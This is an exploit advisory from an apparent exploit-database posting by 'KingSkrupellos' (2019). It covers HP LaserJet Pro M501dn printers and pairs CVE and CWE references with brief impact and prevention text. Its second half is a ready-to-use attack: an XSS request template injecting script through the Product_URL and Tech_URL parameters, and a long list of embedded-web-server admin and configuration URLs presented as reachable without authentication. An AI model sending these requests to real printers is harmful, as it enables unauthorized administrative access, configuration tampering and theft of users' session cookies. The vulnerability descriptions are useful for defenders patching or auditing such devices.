HP LaserJet Pro M501dn Printers 6.7.0.x Auth Bypass XSS

1. ############################################################################################
2.  
3. # Exploit Title : HP LaserJet Pro M501dn Printers 6.7.0.x Authentication Bypass - Cross Site Scripting
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 04/04/2019
7. # Vendor Homepage : hp.com
8. # Software Information Link :
9. 8.hp.com/tr/tr/products/printers/product-detail.html?oid=7710401
10. # Software Version :
11. Driver-Universal Print Driver for Managed Services => 6.7.0.23989
12. Driver-Universal Print Driver => 6.7.0.23989
13. Software Universal Printer Driver => 1.8.6
14. Firmware Datecode => 20150924
15. Control Panel Version => 0x00
16. Maximum Print Quality => ProRes 1200
17. # Tested On : Windows and Linux
18. # Category : Hardware
19. # Exploit Risk : High / Medium
20. # Common Vulnerability Enumeration :
21. CVE-2009-0941
22. CVE-2009-2684
23. # Vulnerability Type :
24. CWE-306 [ Missing Authentication for Critical Function ]
25. CWE-592 [ Authentication Bypass ]
26. CWE-287 [ Improper Authentication ]
27. CWE-79 [ Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ]
28. CWE-264 [ Permissions, Privileges, and Access Controls ]
29. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
30. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
31. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
32.  
33. ############################################################################################
34.  
35. # Description about Software :
36. ***************************
37. HP LaserJet as a brand name identifies the line of dry electrophotographic DEP laser printers marketed by the American
38.  
39. computer company Hewlett-Packard (HP). The HP LaserJet was the world's first desktop laser printer.
40.  
41. ############################################################################################
42.  
43. # Impact :
44. ***********
45. Authentication Bypass / Missing Authentication For Critical Function :
46. ************************************************************
47. When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.
48.  
49. Remote attackers can edit - delete and access files and administrative access without real administrator permission.
50.  
51. Remote attackers can bypass this because the system doesn't ask admin username and password.
52.  
53. The software does not perform any authentication for functionality that requires a provable user identity
54.  
55. or consumes a significant amount of resources.
56.  
57. The vulnerability allows a remote unauthenticated attacker to send specially crafted HTTP request to the
58.  
59. affected application and change configuration settings or gain administrative access.
60.  
61. Missing authentication for critical function is a language independent issue that can appear in any multiuser environment.
62.  
63. Developing a fix would require understanding of the current application security model and implemented access controls.
64.  
65. Three basic rules however can help you eliminate potential improper authorization issues:
66.  
67. 1) Identify all privileged assets within your application (web pages that display sensitive data,
68. website sections that contain privileged/administrative functionality, etc.)
69.  
70. 2) Identify user roles within the application and their access permissions
71.  
72. 3) Always check if the user should have privileges to access the asset.
73.  
74. XSS Cross Site Scripting Impact /Prevention :
75. ****************************************
76. are prone to a cross-site scripting vulnerability
77. because it fails to sufficiently sanitize user-supplied data.
78.  
79. A remote user can access the target user's cookies (including authentication cookies),
80. if any, associated with the HP Printer interface, access data recently submitted by the
81. target user via web form to the site, or take actions on the site acting as the target user.
82.  
83. Cross-site scripting vulnerability in HP Jetdirect and the Embedded Web Server (EWS)
84. on certain HP LaserJet and Color LaserJet printers allow remote attackers to
85. inject arbitrary web script or HTML via the (1) Product_URL or (2) Tech_URL parameter in an
86. Apply action to the support_param.html/config script.
87.  
88. Prevention of XSS Vulnerability :
89. ****************************
90. set the administrator password
91. use a new browser instance for administrator tasks
92. do not access other web sites while performing administrator tasks
93. exit the browser when administrator tasks are complete
94.  
95. According to the CVE-2009-0941 =>
96. *********************************
97. The HP Embedded Web Server (EWS) on HP LaserJet Printers, Edgeline Printers, and Digital Senders
98. has no management password by default, which makes it easier for remote attackers to obtain access.
99.  
100. According to the CVE-2009-2684 =>
101. *********************************
102. Multiple cross-site scripting (XSS) vulnerabilities in Jetdirect and the Embedded Web Server (EWS) on
103. certain HP LaserJet and Color LaserJet printers, and HP Digital Senders, allow remote attackers to
104. inject arbitrary web script or HTML via the (1) Product_URL or (2) Tech_URL parameter
105. in an Apply action to the support_param.html/config script.
106.  
107. ############################################################################################
108.  
109. XSS Cross Site Scripting Exploit :
110. *******************************
111. https://[targetipaddress]/support_param.html/config?Admin_Name=&Admin_Phone=&Product_URL=[XSS]&Tech_URL=[XSS]&Apply=Apply
112.  
113. It returns as " /success_result.htm/config "
114.  
115. Configuration Successfully Done.
116.  
117. # Authentication Bypass Exploit / Vulnerability :
118. *******************************************
119. https://[targetipaddress]/hp/device/this.LCDispatcher
120.  
121. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.EmailServer
122.  
123. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=1&lstid=-1
124.  
125. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=3&lstid=1
126.  
127. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Alerts
128.  
129. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.AutoSend
130.  
131. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Security&fldPage=0
132.  
133. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.OtherLinks
134.  
135. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Config
136.  
137. https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.DeviceInfoConfig
138.  
139. https://[targetipaddress]info_configuration.html?tab=Home&menu=DevConfig
140.  
141. https://[targetipaddress]/hp/device/Auth/set_config_deviceinfo.htm
142.  
143. https://[targetipaddress]/hp/device/info_configuration.htm
144.  
145. https://[targetipaddress]/hp/jetdirect
146.  
147. https://[targetipaddress]/config_pro.htm
148. https://[targetipaddress]/tcpipv6.htm
149. https://[targetipaddress]/tcpipv4.htm
150.  
151. https://[targetipaddress]/tcp_param.htm
152. https://[targetipaddress]/network_id.htm
153.  
154. https://[targetipaddress]/tcp_summary.htm
155. https://[targetipaddress]/index_info.htm
156.  
157. https://[targetipaddress]/support_param.html
158. https://[targetipaddress]/support.htm
159.  
160. https://[targetipaddress]/tcp_diag.htm
161. https://[targetipaddress]/configpage.htm
162.  
163. https://[targetipaddress]/tcp_param.htm
164. https://[targetipaddress]/network_id.htm
165.  
166. ############################################################################################
167.  
168. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
169.  
170. ############################################################################################